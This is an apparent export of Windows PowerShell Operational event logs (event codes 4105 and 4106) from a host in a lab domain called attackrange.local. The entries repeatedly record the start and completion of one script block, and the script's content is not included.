Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468264
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468263
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468262
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468261
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468260
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468259
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468258
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468257
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468256
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468255
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468254
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468253
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468252
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468251
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468250
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468249
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468248
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468247
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468246
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468245
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468244
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468243
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468242
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468241
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468240
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468239
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468238
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468237
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468236
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468235
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:11 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468234
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468506
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468505
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468504
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468503
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468502
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468501
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468500
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468499
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468498
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468497
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468496
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468495
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468494
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468493
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468492
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468491
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468490
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468489
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468488
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468487
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468486
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468485
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468484
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468483
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468482
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
